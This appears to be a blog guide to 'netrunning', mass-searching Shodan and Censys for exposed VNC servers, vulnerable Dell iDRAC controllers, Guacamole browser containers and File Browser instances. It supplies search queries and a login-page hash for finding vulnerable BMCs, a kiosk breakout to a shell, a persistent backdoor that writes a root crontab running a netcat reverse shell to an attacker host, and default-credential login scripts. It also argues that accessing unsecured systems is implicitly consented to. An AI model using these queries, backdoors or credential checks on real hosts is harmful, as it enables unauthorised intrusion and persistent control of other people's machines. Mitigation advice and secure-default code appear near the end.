NETRUNNER GUIDE


What is a Netrunner?

In their 1991 nonfiction whodunit, Cyberpunk: Outlaws and Hackers on the Computer Frontier, Katie Hafner and John Markoff used the word "cyberpunk" to describe "young people for whom computers and computer networks are an obsession, and who have carried their obsession beyond what computer professionals consider ethical and lawmakers consider acceptable."

Netrunners are the elite hackers in the tabletop RPG Cyberpunk. Per the wiki, they roam the Net looking for systems to hack and information to sell. They tend to hold libertarian values where the Internet is concerned and don't shy away from skirting the law to reach interesting places and information. This is an apt description for the style of security research described here.

Tools such as Shodan, Censys, ZoomEye, Masscan, and Nmap have been used to scan ports and track internet-connected hosts for years. The first three are search engines over continuous internet-wide scan data; the last two are scanners you run yourself. Together they provide a means of indexing and searching the REAL Internet (most people think of the Internet as the web). A number of interesting hosts and services can be found with relative ease; others take a bit more effort.

Leveraging these tools to find internet-connected hosts with open access or potential vulnerabilities, with no specific target in mind, is what will be termed "netrunning" here. It leans more towards the Gibsonian "console cowboy", though not always.

The main approach is to find some system revealing some method of access, then identify the pattern so it can be reduced to a search filter. For example, one could find a vulnerable version of a device and search by some unique identifier such as the favicon hash of its login page. Another approach is to key on banners, or on a portion of the data returned by the scan. VNC hosts can be identified by the RFB protocol banner ("RFB 003.008" and the like), and if the server offers no authentication the handshake proceeds straight to a ServerInit message whose desktop name usually contains the hostname and the logged-in user.

With the major influx of cloud systems in recent years, more and more hosts are connected to the internet with no firewall at all. Companies spent the past 10 or 20 years securing the perimeter, investing in firewall technology and external pentests, and for many of them those same systems have now been placed right back on the internet as cloud instances.

 

Philosophy

  1. Port scanning is not a crime
  2. Accessing an open system is not a crime
  3. Exploitation is a moral grey area 
  4. The current laws regarding the internet & cybercrime aren't great

I am not a lawyer, this is not legal advice, some actions within this text may be illegal in some jurisdictions, and I am not endorsing or otherwise encouraging any of the actions in this piece. This is for educational purposes only; any media on this page was produced within a lab environment and is a simulation of events. That also hampers the credibility of my legal opinion, but my point is that I think these laws need to be reassessed and thought about critically by those with the proper knowledge and experience.

Point number 1 is true and the points slowly descend into more radical ideas. 

Accessing an open system is a grey area. In many cases it has been detrimental to parties that took some action on a system against the operator's will; Weev and Aaron Swartz are the usual examples. US tort law has the "attractive nuisance" doctrine: if you have a swimming pool (server) on your property (network) that is not protected by a fence (firewall/ACL/etc.) and someone drowns, the owner of the property (operator) is liable.

I think the law should be the same for openly accessible systems: access is implicitly consensual. You don't need express permission to access a website unless it requires a login, at which point you typically agree to some terms to gain access. A web server hosting an "Index of" directory is the same thing. It doesn't matter if it's a directory of SSH private keys or an MP3 archive. By putting a server on the internet without authentication you are saying "you can access this system without explicit authorization, as the configuration implies".

I may elaborate on other points in future version of this text. 

This is mainly concerning the morality/legality of the subject and not necessarily focused on economic or political philosophy. 

 

Part I - Background/Introduction

Netrunning was my foray into the world of ‘hacking’ in a networked security context. I started in elementary school and would spend hours after school and in the summer at the public library computer lab. It all began with google dorks and the ability to find open webcams on the internet. It became more than a hobby for me, I could travel all around the world from my desktop and be a fly on the wall. Cameras equipped with PTZ functionality took it to a different level and I was able to find dorks for specific PTZ cameras. 

This is the important aspect mentioned earlier. The same concept applies to IDOR research, and it is rather subtle: find a unique pattern in some small subset of available hosts that reliably identifies other, similar hosts.

I scoured the internet using other tools like PunkSpider (old tool that indexed hosts with web vulnerabilities) and found my fair share of hosts vulnerable to SQL injection.

Over the years I've encountered a staggering number of internet connected machines. From server management controllers to automated systems used in agriculture. SCADA and ICS systems are probably some of the most well-known in the port scanning scene due to their uniqueness and perceived ability to cause damage. (This would sort of make a good iceberg chart) 

There have been several major vulnerabilities in recent years: Heartbleed, BlueKeep, Shellshock, to name a few. Though these can be mass-exploited with ease for fun and profit, they don't make for a great target group precisely because of their popularity and ease of exploitation. The best approach typically involves some step that is difficult or impossible to automate.

There are governments (somewhat speculative) as well as groups of professional criminals (APT-style outfits) with people dedicated to this sort of work, and it's nearly impossible to compete with them on well-known exploits and access methods.

I feel like this is something that isn't really given a spotlight, especially among all of the other "cooler" trends currently in the field: malware, reverse engineering, API security. Maybe it will become more popular, since this is the approach Maia took to find open Jenkins build servers and leak the TSA No Fly list (WARNING: I don't think she can leave whatever country she's in, so be careful lol).

 

Part II - VNC 

VNC and RDP are two exemplary services when it comes to this sort of thing; they are what got me back into it and eventually led to me writing this. Computernewb (best known for CollabVM) has a tool called VNC Resolver that displays random insecure VNC servers. It is similar to sites like srsly.de, WorldofVNC, Shodan, and others. The scans are only done periodically, and the last scan was completed May 2022.

I set out to create my own scanning interface, which is still incomplete and turned out to be a monstrous task. It also doesn't help that it's incredibly difficult to find a VPS provider that allows port scanning. My preferred provider briefly allowed port scanning during the period in which I wrote the tool.

This led me down a rabbit hole of filtering and searching within Censys. I ended up with a very simple search with a number of different variations. The desktop name field accepts a wildcard ("**"), which matches every VNC server exposing a desktop name. Since a server only sends ServerInit (and the desktop name inside it) after the security handshake completes, and Censys never tries passwords, a scanner seeing a desktop name equates to the server not requiring auth.

5900.vnc.banner.desktop_name: {vnc_banner_desktop_name} OR 5901.vnc.banner.desktop_name: {vnc_banner_desktop_name}

Censys has since made changes to the API, and I believe this query will need to be reconstructed. I leave this as an exercise to the reader (I've always wanted to say that). I find Shodan to be a better tool overall, and the query would probably include some portion of the VNC banner:

RFB X.XX
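To make the "desktop name means no auth" rule from above concrete, here is an added example (my code, not the original author's tooling and not what Censys or Shodan run) that drives the RFB handshake exactly as far as a scanner needs to: read the banner, answer with a version, read the offered security types, and only if the server offers type None continue to ClientInit and pull the desktop name out of ServerInit. It never sends a password. The transcripts at the bottom are constructed byte strings standing in for a socket, not captures from real hosts; the hostnames and desktop names in them are made up.

```python
import struct

# RFB security types relevant to this check (RFC 6143, section 7.1.2)
SEC_INVALID, SEC_NONE, SEC_VNCAUTH = 0, 1, 2


class RFBError(Exception):
    pass


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise RFBError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def _read_server_init(sock):
    # ServerInit: width u16, height u16, 16-byte PIXEL_FORMAT, name length u32, name
    width, height = struct.unpack(">HH", _recv_exact(sock, 4))
    _recv_exact(sock, 16)
    (name_len,) = struct.unpack(">I", _recv_exact(sock, 4))
    name = _recv_exact(sock, name_len).decode("latin-1", "replace")
    return {"width": width, "height": height, "desktop_name": name}


def rfb_probe(sock):
    """Run the RFB handshake only far enough to learn whether the server
    demands authentication. If it offers security type None, send ClientInit
    (shared=1) and return the ServerInit desktop name; otherwise desktop_name
    stays None and no credentials are ever attempted."""
    banner = _recv_exact(sock, 12)
    if banner[:4] != b"RFB " or banner[11:12] != b"\n":
        raise RFBError("not an RFB banner: %r" % banner)
    major, minor = int(banner[4:7]), int(banner[8:11])
    if (major, minor) >= (3, 8):   # clients cap at 3.8 (some servers announce 3.889)
        minor = 8
    if major != 3 or minor not in (3, 7, 8):
        raise RFBError("unsupported RFB version %d.%d" % (major, minor))
    sock.sendall(b"RFB %03d.%03d\n" % (major, minor))
    result = {"banner": banner.decode("ascii", "replace").strip(),
              "version": "%d.%d" % (major, minor),
              "security_types": [], "desktop_name": None}
    if minor == 3:
        # 3.3: the server dictates a single security type as a u32
        (sectype,) = struct.unpack(">I", _recv_exact(sock, 4))
        result["security_types"] = [sectype]
        if sectype != SEC_NONE:
            return result
    else:
        # 3.7/3.8: server lists the types it accepts, client picks one
        count = _recv_exact(sock, 1)[0]
        if count == 0:
            (rlen,) = struct.unpack(">I", _recv_exact(sock, 4))
            raise RFBError("server refused: " + _recv_exact(sock, rlen).decode("latin-1", "replace"))
        types = list(_recv_exact(sock, count))
        result["security_types"] = types
        if SEC_NONE not in types:
            return result
        sock.sendall(bytes([SEC_NONE]))
        if minor == 8:   # 3.8 sends a SecurityResult even for None; 3.7 does not
            (status,) = struct.unpack(">I", _recv_exact(sock, 4))
            if status != 0:
                raise RFBError("SecurityResult reported failure")
    sock.sendall(b"\x01")   # ClientInit, shared=1: do not kick off a logged-in user
    result.update(_read_server_init(sock))
    return result


class ScriptedServer:
    """Constructed socket stand-in: replays canned server bytes and records
    what the client sent, so the example runs offline against no real host."""

    def __init__(self, transcript):
        self.pending, self.received = transcript, b""

    def recv(self, n):
        chunk, self.pending = self.pending[:n], self.pending[n:]
        return chunk

    def sendall(self, data):
        self.received += data


def server_init(width, height, name):
    return struct.pack(">HH", width, height) + b"\x00" * 16 + struct.pack(">I", len(name)) + name


# Constructed transcripts (not captures): open 3.8 server, password-protected 3.8
# server offering VNC auth (2) and TLS (16), and an open legacy 3.3 server.
OPEN_38 = (b"RFB 003.008\n" + bytes([1, SEC_NONE]) + struct.pack(">I", 0)
           + server_init(1024, 768, b"root's X desktop (lab-kiosk:1)"))
AUTH_38 = b"RFB 003.008\n" + bytes([2, SEC_VNCAUTH, 16])
OPEN_33 = b"RFB 003.003\n" + struct.pack(">I", SEC_NONE) + server_init(800, 600, b"lab-dvr")


def probe_transcript(transcript):
    return rfb_probe(ScriptedServer(transcript))


if __name__ == "__main__":
    for t in (OPEN_38, AUTH_38, OPEN_33):
        r = probe_transcript(t)
        print(r["version"], r["security_types"], r["desktop_name"])
```

Against a live host you would pass a real `socket.create_connection((host, 5900), timeout=5)` in place of ScriptedServer; the shared flag in ClientInit matters, because a non-shared ClientInit on some servers disconnects whoever is already using the console, which is exactly the kind of "action against the operator's will" the philosophy section is about.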

I wrote another tool to go through the Censys data and screenshot the VNC hosts. Many of these servers were an environment that I will describe in more detail later: an application such as FileZilla or JDownloader served over VNC. Though the environment may be somewhat isolated and stripped down, in most instances it is possible to break out with simple kiosk breakout techniques. For example, using the File > Open menu within FileZilla and opening a file in vim allows one to get to a shell prompt with

 :!/bin/sh

Potential findings may include:

 

Part III - BMC 

Service/Protocol: Dell iDRAC

Probably the highest impact of all the services mentioned. An RCE vulnerability in the iDRAC platform was discovered several years ago, and the exploit is publicly available and easily executed.

Dell iDRAC7 and iDRAC8 Code Injection Vulnerability (RCE)
Vulnerable firmware versions: < 2.52.52.52
CVE: CVE-2018-1207

 

The query for this one is rather simple. After identifying a vulnerable host, one can use the SHA-1 hash of its login page body to find other hosts running the same firmware. At the time of writing, the following Censys query returned 2,380 hosts with a vulnerable BMC attached to the internet. I learned this little trick from an article about searching for SonicWalls using the favicon hash.

services.http.response.body_hash="sha1:f67deb5fcb06bd39b7447b858e092cd6fbfe1bf4"

(There are multiple page hashes that can be used to identify vulnerable hosts)
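Both pivots used on this page, the Censys body hash and the Shodan favicon hash, come out of one captured response. Here is an added example (my code, not the author's or either search engine's) that turns a saved login page and its favicon into the two query strings. Censys's body_hash is a plain SHA-1 of the response body. Shodan's favicon hash is MurmurHash3 (x86, 32-bit, signed) over the base64 text of the icon as produced by Python's base64.encodebytes, line breaks included, which is what the usual mmh3-based scripts compute; MurmurHash3 is implemented inline so the block runs without the mmh3 package, and it is checked against the library's documented value for "foo". The sample page body and favicon bytes are constructed placeholders, not a real iDRAC response.

```python
import base64
import hashlib


def murmur3_32(data, seed=0):
    """MurmurHash3 x86_32 (the algorithm behind mmh3.hash), unsigned result."""
    c1, c2, mask = 0xCC9E2D51, 0x1B873593, 0xFFFFFFFF
    h = seed & mask
    nblocks = len(data) // 4
    for i in range(nblocks):
        k = int.from_bytes(data[4 * i:4 * i + 4], "little")
        k = (k * c1) & mask
        k = ((k << 15) | (k >> 17)) & mask
        k = (k * c2) & mask
        h ^= k
        h = ((h << 13) | (h >> 19)) & mask
        h = (h * 5 + 0xE6546B64) & mask
    tail = data[nblocks * 4:]
    k = 0
    if len(tail) >= 3:
        k ^= tail[2] << 16
    if len(tail) >= 2:
        k ^= tail[1] << 8
    if len(tail) >= 1:
        k ^= tail[0]
        k = (k * c1) & mask
        k = ((k << 15) | (k >> 17)) & mask
        k = (k * c2) & mask
        h ^= k
    # finalisation mix
    h ^= len(data)
    h ^= h >> 16
    h = (h * 0x85EBCA6B) & mask
    h ^= h >> 13
    h = (h * 0xC2B2AE35) & mask
    h ^= h >> 16
    return h


def signed32(x):
    return x - (1 << 32) if x & 0x80000000 else x


def shodan_favicon_hash(favicon):
    # Shodan hashes the base64 *text* of the icon, with the 76-column line
    # breaks that codecs.encode(..., "base64") / base64.encodebytes insert.
    return signed32(murmur3_32(base64.encodebytes(favicon)))


def censys_body_hash(body):
    return "sha1:" + hashlib.sha1(body).hexdigest()


def pivot_queries(body, favicon=None):
    """Build the search-engine filters for 'every host serving this exact page'."""
    queries = {"censys": 'services.http.response.body_hash="%s"' % censys_body_hash(body)}
    if favicon is not None:
        queries["shodan"] = "http.favicon.hash:%d" % shodan_favicon_hash(favicon)
    return queries


# Constructed placeholders standing in for a saved login page and its icon
SAMPLE_BODY = b"<html><head><title>Login</title></head><body>constructed sample page</body></html>"
SAMPLE_FAVICON = b"\x00\x00\x01\x00\x01\x00\x10\x10\x00\x00\x01\x00\x20\x00" + b"\x00" * 32

if __name__ == "__main__":
    for engine, query in pivot_queries(SAMPLE_BODY, SAMPLE_FAVICON).items():
        print(engine, query)
```

Two caveats when you use this for real: the body hash matches one exact byte sequence, so each firmware build (and each customised login banner) needs its own hash, which is why the page notes there are several; and hash your capture of the raw, undecoded body as the scanner saw it, since any re-encoding changes the SHA-1.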

 

One could easily backdoor the BMC post-exploitation by passing something like the following (note that nc takes the listener host first, then the port):

racadm getsysinfo                        # confirm which BMC/host you landed on
cd /flash/data0/crontabs                 # busybox crond reads per-user crontabs here
echo "*/15 * * * * /bin/nc {LHOST} {LPORT} -e /bin/sh" > root   # overwrites root's crontab
sleep 3
nc {LHOST} {LPORT} -e /bin/sh

 

The worst part is that these devices were never intended to be connected to the internet. You'd normally find them on an organization's IT/management network, but nonetheless. The Dell iDRAC features a full virtual KVM environment and is as close to physical access as one can get without being on site.

 

 

Part IV - Free Guac

Query: http.title:"Guacamole Client" port:"3000"

There is some software that hosts a Docker container with a Firefox browser, the idea being a remotely accessible browser within your browser. Well, this is a security nightmare. The app is a Docker container that ships a full-fledged Openbox environment: you're able to close Firefox and use xterm. The image has a default user abc with password abc, which is permitted to use sudo by default…

Some provided a full desktop environment…

 

Pivoting from this service is possible if there is a route to the host machine's LAN. Hint: the credentials for the router are often Admin:Admin.

Part V - File Browser

File Browser is a nice program, I like it, but… yeah. It is a no-fuss web file server written in Go: you can share any directory over the network with a simple command. The default credentials for the web interface are the infamous admin:admin.

http.title:"File Browser"

The program's web UI authenticates through its own API, which makes it simple to automate without fancy tools like Burp. Stripped of the browser's boilerplate headers (which File Browser ignores), the login request looks like this:

curl -X POST 'https://{RHOST}:{RPORT}/api/login' \
  -H 'Content-Type: application/json' \
  --data-raw '{"username":"admin","password":"admin","recaptcha":""}'

A 200 response carrying a JWT in the body means the default credentials still work; a 403 means they don't.

It would then be trivial to write a simple Python script looping over the discovered hosts and sending this request. The script could then be extended for brute-forcing, as well as using the command API either to act as a remote shell itself or to send a connection back to the client machine.
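The loop described above, written out as an added example (my code, not the author's script) framed as the check you would run against File Browser instances you operate: one POST of the default credentials per host, a verdict per host, and no password list. The transport is injectable so the block runs offline; ScriptedTransport and its canned answers are constructed, the "JWT" in it is a made-up string, and the 10.0.0.x addresses are placeholders. Against real hosts the default http_transport uses only the standard library.

```python
import json
import urllib.error
import urllib.request

DEFAULT_CREDS = ("admin", "admin")


def login_request(host, port, username, password, scheme="https"):
    """The same POST /api/login the web UI sends, minus the browser noise:
    File Browser only looks at the JSON body and its Content-Type."""
    url = "%s://%s:%d/api/login" % (scheme, host, port)
    body = json.dumps({"username": username, "password": password, "recaptcha": ""}).encode()
    headers = {"Content-Type": "application/json",
               "User-Agent": "filebrowser-default-cred-audit/1.0"}   # be identifiable in logs
    return urllib.request.Request(url, data=body, method="POST", headers=headers)


def http_transport(req, timeout=10):
    """Real transport: returns (status, body); HTTP error codes are results, not exceptions."""
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def classify(status, body):
    # Success is a 200 whose body is a bare JWT (three dot-separated segments,
    # header starting with 'eyJ'); a wrong password is answered with 403.
    if status == 200 and body.startswith(b"eyJ") and body.count(b".") == 2:
        return "default_creds_accepted"
    if status == 403:
        return "auth_required"
    return "unexpected_%d" % status


def audit(hosts, transport=http_transport, creds=DEFAULT_CREDS):
    """One default-credential attempt per (host, port). Returns {(host, port): verdict}."""
    verdicts = {}
    for host, port in hosts:
        try:
            status, body = transport(login_request(host, port, *creds))
        except OSError as err:   # DNS failure, refused, timeout, TLS error
            verdicts[(host, port)] = "error_%s" % err.__class__.__name__
            continue
        verdicts[(host, port)] = classify(status, body)
    return verdicts


class ScriptedTransport:
    """Constructed stand-in for http_transport so the example runs offline.
    Keyed by host; bodies are made up and the 'JWT' is not a real token."""
    CANNED = {
        "10.0.0.5": (200, b"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoxfQ.c2lnbmF0dXJl"),
        "10.0.0.6": (403, b"Forbidden"),
        "10.0.0.7": (404, b"404 page not found"),
    }

    def __call__(self, req):
        host = req.full_url.split("//", 1)[1].split(":", 1)[0]
        assert json.loads(req.data)["username"] == "admin"   # the request really carries the creds
        if host not in self.CANNED:
            raise ConnectionRefusedError(host)
        return self.CANNED[host]


SAMPLE_HOSTS = [("10.0.0.5", 8080), ("10.0.0.6", 8080), ("10.0.0.7", 80), ("10.0.0.9", 8080)]

if __name__ == "__main__":
    for (host, port), verdict in audit(SAMPLE_HOSTS, transport=ScriptedTransport()).items():
        print("%s:%d %s" % (host, port, verdict))
```

A host that lands in "default_creds_accepted" is one where anyone on the internet has the same access the admin does, including the command API the text mentions; a 404 or connection error usually means the title match was a false positive or the instance sits behind something else on that port.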


 

Part VI - Mitigation 

A lot of these services are hosted in the cloud. One approach is to set up your server with software intended to host multiple applications behind a single login, although this software isn't fully there yet. Cloudron and Umbrel will let you host multiple apps on a server and enforce authentication.

You can have a firewall in the cloud! I host or have hosted a lot of the services previously mentioned, and they're all behind a firewall. I have a pfSense instance hosted in the cloud. All DNS entries for several different domains point to the IP of the pfSense box. Other VPS servers and my home network all connect back to this box via VPN. This is essentially like having a private LAN (hence "Virtual Private Network") in the cloud. I in turn use Tailscale to access the network from external devices such as my phone and laptop.

Any hosted application is proxied through HAProxy, which hosts a single shared HTTPS frontend. Now I can access services hosted at home or in the cloud with full control over the traffic. This makes it simple to blacklist nefarious IP addresses or network scanners such as Shodan. I don't have any IDS/IPS configured, but that's an option too.

Obviously, if you're on a local network, enable your ISP router's firewall or build/buy/recycle a fancier one.

 

Part VII - Synopsis

In the early days the problem was security itself. Devices were connected to the internet and happy to provide services like FTP, Telnet, VNC, and so on without requiring authentication. We soon found this isn't a very good idea and started protecting these services with firewalls. The focus then shifted to hardware and the perimeter, ensuring there was some physical device sitting between the servers and the internet. We've now come full circle with cloud services that provide very little security on the customer's behalf, and the same problems are reappearing.

Developers should also take a more critical approach to the security of their applications, as there are many assumptions but no certainty about where or how an operator will run their code. Default passwords should almost NEVER be set to something easily guessable or available in public documentation; generating a random password on first run, or forcing a change of the default password on first login, is an effective and simple solution.
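What the two recommendations above look like in code, as an added example (mine, not taken from File Browser or any of the projects mentioned): a minimal credential store whose first run generates a random admin password instead of shipping admin:admin, returns it exactly once so the operator can read it from the console, flags the account as must-change, and refuses to let the replacement be short or one of the usual defaults. The password hashing uses PBKDF2-HMAC-SHA256 from the standard library; the round count is deliberately low so the example runs quickly and should be raised in production. The WEAK list is a small constructed sample, not a complete list.

```python
import hashlib
import hmac
import os
import secrets

PBKDF2_ROUNDS = 100_000   # illustrative; raise for production hardware
SALT_LEN = 16
# Constructed sample of defaults that must never be accepted as a new password
WEAK = {"admin", "password", "changeme", "abc", "123456", "default"}


def hash_password(password, salt=None):
    """Return salt || PBKDF2(password) so the salt travels with the digest."""
    salt = salt or os.urandom(SALT_LEN)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt + digest


def verify_password(password, stored):
    salt, digest = stored[:SALT_LEN], stored[SALT_LEN:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


class UserStore:
    """Minimal credential store showing the two first-run behaviours the
    text recommends: a generated random admin password and a forced change."""

    def __init__(self):
        self.users = {}   # username -> {"hash": bytes, "must_change": bool}

    def bootstrap_admin(self):
        """First run only. Never a fixed string: 192 bits from the OS CSPRNG,
        returned once for the operator and flagged so it must be replaced."""
        if self.users:
            raise RuntimeError("store already bootstrapped")
        password = secrets.token_urlsafe(24)
        self.users["admin"] = {"hash": hash_password(password), "must_change": True}
        return password

    def login(self, username, password):
        user = self.users.get(username)
        if user is None or not verify_password(password, user["hash"]):
            return "denied"
        return "change_password_required" if user["must_change"] else "ok"

    def change_password(self, username, old, new):
        if self.login(username, old) == "denied":
            return False
        if len(new) < 12 or new.lower() in WEAK:
            return False   # refuse to trade one guessable default for another
        self.users[username] = {"hash": hash_password(new), "must_change": False}
        return True


if __name__ == "__main__":
    store = UserStore()
    first_run_password = store.bootstrap_admin()
    print("initial admin password (shown once):", first_run_password)
    print(store.login("admin", "admin"))              # denied
    print(store.login("admin", first_run_password))   # change_password_required
```

The contrast with the services in Parts IV and V is that nothing here is guessable from documentation: an operator who deploys the image and never reads the console cannot log in either, which is the failure mode you want, rather than a working admin:admin on the public internet.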

These issues will only become more prevalent as ever more devices are connected to the internet, IPv6 is adopted, and more and more code is written.

Part VIII - Minutia